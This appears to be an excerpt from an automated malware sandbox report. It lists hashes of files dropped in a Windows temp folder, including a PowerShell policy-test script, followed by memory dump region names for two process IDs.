C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt

MD5 4c4cc23f3a17e931d1972c751c095e49
SHA1 5e1298fed9d1e92444447d4257ef0e5fcd66031d
SHA256 b068b30fb603c1a1bb4efbae00c421a6b5014f15b5757dfaff0348d8236be129
SHA512 8a77950e5c116e1f925eac15458990a8aebc5abd3330d9d3e81d5e0a4faf1811dde4e21d8c4cddff0aa086f595d1a867d4965392089a56699354f2535c635181

C:\Users\Admin\AppData\Local\Temp\postfertilizations.txt

MD5 cf56f5795de669e0ee0796627c7142f2
SHA1 89a71383fe582e3ec82a024fd424cef08943daf9
SHA256 858e8b3e4c8bd64f2d11683cc1becf863238c7804c6712cfab844589591510bf
SHA512 c331627fe54d5849ae37d29ce028d2a600d2a6a33351384abff6a594fc2ba109e3d09b45a5a15c1e656e33811fbf0ffb0c02983f9f45f50e2f149b0749707a30

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wuuj24qa.3nd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3148-254-0x000001F73C7C0000-0x000001F73C7E2000-memory.dmp

memory/3148-258-0x00007FFD697F0000-0x00007FFD6A2B1000-memory.dmp

memory/3148-259-0x000001F754E20000-0x000001F754E30000-memory.dmp

memory/3148-260-0x000001F754E20000-0x000001F754E30000-memory.dmp

memory/3148-261-0x000001F754DC0000-0x000001F754DE6000-memory.dmp

memory/3148-262-0x000001F757320000-0x000001F757334000-memory.dmp

memory/3148-263-0x000001F754E20000-0x000001F754E30000-memory.dmp

memory/3148-264-0x000001F754E20000-0x000001F754E30000-memory.dmp

memory/3140-265-0x0000000004F40000-0x0000000004F76000-memory.dmp

memory/3140-266-0x0000000075060000-0x0000000075810000-memory.dmp

memory/3140-267-0x0000000002B80000-0x0000000002B90000-memory.dmp

memory/3140-268-0x0000000002B80000-0x0000000002B90000-memory.dmp

memory/3140-269-0x00000000055B0000-0x0000000005BD8000-memory.dmp

memory/3140-270-0x0000000005520000-0x0000000005542000-memory.dmp

memory/3140-272-0x0000000005DC0000-0x0000000005E26000-memory.dmp

memory/3140-271-0x0000000005D50000-0x0000000005DB6000-memory.dmp

memory/3140-282-0x0000000005EF0000-0x0000000006244000-memory.dmp

memory/3140-283-0x00000000064F0000-0x000000000650E000-memory.dmp

memory/3140-284-0x0000000006530000-0x000000000657C000-memory.dmp

memory/3140-285-0x0000000007D40000-0x00000000083BA000-memory.dmp

memory/3140-286-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

memory/3140-287-0x0000000007770000-0x0000000007806000-memory.dmp

memory/3140-288-0x0000000007720000-0x0000000007742000-memory.dmp

memory/3140-289-0x0000000008970000-0x0000000008F14000-memory.dmp

memory/3140-290-0x0000000007990000-0x00000000079B2000-memory.dmp

memory/3140-291-0x00000000079F0000-0x0000000007A04000-memory.dmp

memory/3140-292-0x0000000075060000-0x0000000075810000-memory.dmp

memory/3148-295-0x00007FFD697F0000-0x00007FFD6A2B1000-memory.dmp